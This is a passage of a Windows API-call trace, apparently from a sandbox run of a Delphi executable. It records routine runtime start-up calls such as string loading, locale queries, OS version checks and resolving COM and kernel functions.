lpBuffer="Error creating variant or safe array") returned 0x24 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, 
cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0174.906] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0174.907] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0174.907] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0174.907] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0174.907] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0174.907] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x2c4438 [0174.907] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0174.907] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0174.907] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0174.907] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0174.907] LoadStringW (in: hInstance=0x400000, 
uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0174.907] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0174.907] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0174.907] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0174.907] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0174.907] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0174.907] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0174.907] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0174.907] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0174.907] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0174.907] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x13f80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", 
lpUsedDefaultChar=0x0) returned 19 [0174.907] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0174.907] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 0x30 [0174.908] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0174.908] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0174.908] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0174.908] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0174.908] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0174.908] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0174.908] GetThreadLocale () returned 0x409 [0174.908] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0174.908] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0174.908] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0174.908] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0174.908] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0174.908] LocalAlloc 
(uFlags=0x40, uBytes=0x8) returned 0x2c4448 [0174.908] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0174.908] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0174.909] GetLastError () returned 0x7a [0174.909] GetLogicalProcessorInformation (in: Buffer=0x13e99d0, ReturnedLength=0x12fab0 | out: Buffer=0x13e99d0, ReturnedLength=0x12fab0) returned 1 [0174.909] GetCurrentThreadId () returned 0x728 [0174.909] GetCurrentThreadId () returned 0x728 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0174.909] GetThreadLocale () returned 0x409 [0174.909] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0174.909] GetThreadLocale () returned 0x409 [0174.909] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0174.909] GetCurrentThreadId () returned 0x728 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, 
lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0174.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0174.910] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0174.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0174.911] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0174.911] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0174.911] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0174.911] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0174.911] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0174.911] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, 
cchData=2 | out: lpLCData=",") returned 2 [0174.911] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0174.911] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0174.911] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0174.911] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0174.911] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0174.911] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0174.911] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0174.911] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0174.911] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0174.911] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0174.911] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0174.911] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0174.912] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0174.912] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0174.912] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0174.912] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0174.912] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0174.912] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0174.912] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0174.912] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0174.912] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0174.912] GetProcAddress (hModule=0x76c10000, 
lpProcName="VarBstrFromDate") returned 0x76c27a2a [0174.912] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0174.912] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0174.912] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0174.912] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0174.912] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=23170164095) returned 1 [0174.912] GetTickCount () returned 0x32db4 [0174.913] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xe, wMilliseconds=0x2f6)) [0174.913] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xe, wMilliseconds=0x2f6)) [0174.913] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=23170181342) returned 1 [0174.913] GetTickCount () returned 0x32db4 [0174.913] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xe, wMilliseconds=0x2f6)) [0174.913] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x25, wSecond=0xe, wMilliseconds=0x2f6)) [0174.913] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 
lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x13f82bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0174.913] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x13e288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0174.913] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0174.913] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x13f82bc, cbMultiByte=22, 
lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0174.913] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x13f82bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0174.913] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0174.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0174.913] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0174.914] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0174.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0174.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, 
lpMultiByteStr=0x13ff48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0174.914] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0174.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0174.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0174.914] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0174.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0174.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0174.914] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0174.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0174.914] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, 